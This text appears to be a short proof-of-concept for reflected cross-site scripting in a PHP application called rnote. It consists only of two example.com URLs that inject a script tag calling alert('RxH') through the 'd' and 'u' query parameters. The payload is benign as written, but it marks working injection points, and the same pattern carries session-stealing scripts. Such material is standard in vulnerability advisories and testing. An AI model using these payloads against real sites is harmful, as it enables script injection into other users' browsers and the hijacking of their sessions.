http://www.example.com/rnote/rnote.php?d=<script>alert("RxH")</script http://www.example.com/rnote/rnote.php?u=<script>alert("RxH")</script